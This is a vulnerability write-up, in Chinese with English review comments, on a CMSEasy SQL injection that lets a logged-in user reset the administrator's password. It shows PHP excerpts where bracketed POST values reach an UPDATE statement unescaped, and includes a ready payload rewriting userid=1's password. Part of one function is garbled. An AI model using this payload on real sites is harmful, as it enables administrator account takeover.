cmseasy修改任意管理员密码漏洞

lib/default/user_act.php [php]
// Front-end profile update for the logged-in user. Every POSTed key except
// groupid/powerlist is forwarded to rec_update() with a WHERE built from the
// session's userid, so the set of updated columns is chosen by the request.
function edit_action() {
    if(front::post('submit')) {
        // Deny-list: only these two keys are stripped; any other POST key
        // that names a user-table column is passed straight through.
        // NOTE(review): the robust form is an allow-list of the columns a
        // user may edit, applied here before the row reaches rec_update().
        unset(front::$post['groupid']);
        unset(front::$post['powerlist']);
        foreach (front::$post as $k => $v){
            if(is_array($v) && !empty($v)){
                front::$post[$k] = implode(',', $v);
            }
            front::check_type(front::post($k), 'safe'); // the custom is_safe() function has no effect on this; see 0x01
        }
        $this->_user->rec_update(front::$post,'userid='.session::get('userid')); // the problem is here; see 0x02
        front::flash(lang('修改资料成功!'));
        front::redirect(url::create('user/index'));
    }
    $this->view->data=$this->view->user;
}
[/php]
lib/tool/front_class.php 0x01 [php]
// Calls the validator named "is_<$type>" and aborts the request with a 404
// page when it rejects $var. The callee name is built from $type, so any
// is_* function in scope (builtin or user-defined) is reachable this way.
static function check_type($var,$type='number') {
    $func="is_$type";
    if (!$func($var)) {
        header("HTTP/1.0 404 Not Found");
        exit('PAGE NOT FOUND!');
    }
}
// Validator behind check_type(..., 'safe'). Falsy input is accepted
// unconditionally. NOTE(review): the remainder of this body is garbled in
// the listing (an opening comment delimiter and part of the strpos()
// needle are missing), so the exact rejected characters cannot be read
// from here; per the author's note on edit_action it does not stop the
// bracketed form that sql_update() treats as raw SQL.
function is_safe($string) {
    if(!$string) return true;
    if(false !== strpos($string,'addslashes($string)) return false; else*/ return true;
}
[/php]
lib/inc/table.php 0x02 [php]
// Builds an UPDATE for this table from $row (column => value map, or a raw
// SET string) and $where (raw WHERE text) and runs it unbuffered.
function rec_update($row,$where) {
    $tbname=$this->name;
    $sql=$this->sql_update($tbname,$row,$where);
    //echo $sql."\n";
    return $this->query_unbuffered($sql);
}
// Renders "UPDATE `$tbname` SET ... WHERE $where". Keys that are not in
// the table's column list are skipped. A value is single-quoted, except:
// an empty string becomes NULL, and a value of the form "[...]" has the
// text between the brackets spliced into the statement verbatim.
// NOTE(review): no escaping happens in this function; the quoted branch
// relies entirely on the caller, and $where is concatenated as given
// (condition($where) is called but its result is unused, so unless it
// takes $where by reference the WHERE text is the caller's string).
function sql_update($tbname,$row,$where) {
    $sqlud='';
    if (is_string($row)) $sqlud=$row.' ';
    else foreach ($row as $key=>$value) {
        if (in_array($key,explode(',',$this->getcolslist()))) {
            $value=$value; // no-op assignment
            if (preg_match('/^\[(.*)\]$/',$value,$match))
                $sqlud .= "`$key`"."= ".$match[1].",";
                // No quoting: anything matching the regex above is spliced in as-is, so whatever is inside the brackets lands in the statement as SQL.
                //[1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1%23]
                //UPDATE `cmseasy_user` SET `nickname`= 1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1
                // NOTE(review): this raw branch is the defect. A value that
                // originates from request input must never reach it: either
                // skip the "[...]" form for request-sourced rows, or restrict
                // the inner text to the narrow expression callers actually
                // need (e.g. a column name plus an integer) and quote
                // everything else like the branch below.
            elseif ($value === "")
                $sqlud .= "`$key`= NULL, "; // empty string is stored as NULL, not ''
            else
                $sqlud .= "`$key`"."= '".$value."',"; // quoted, but not escaped here
        }
    }
    $sqlud=rtrim($sqlud);     // drop the trailing space left by the NULL branch
    $sqlud=rtrim($sqlud,','); // then the trailing comma
    $this->condition($where);
    $sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where;
    return $sql;
}
[/php]
cms1 cms2
